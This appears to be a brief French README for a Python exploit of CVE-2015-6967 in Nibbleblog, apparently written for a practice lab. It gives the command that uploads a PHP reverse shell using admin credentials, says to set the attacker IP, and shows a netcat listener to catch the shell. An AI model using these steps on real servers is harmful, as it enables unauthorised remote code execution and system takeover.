
Exploit Python pour CVE-2015-6967 ciblant Nibbleblog avec une charge utile de shell inversé. Exécute une exécution de code à distance authentifiée via la vulnérabilité de téléversement de fichier.
python exploit.py --url http://xx.xx.xx.xx --username admin --password nibbles --payload phprevshell.php
Changez $ip à la ligne 7 de phprevshell.php.
nc -lvnp 1234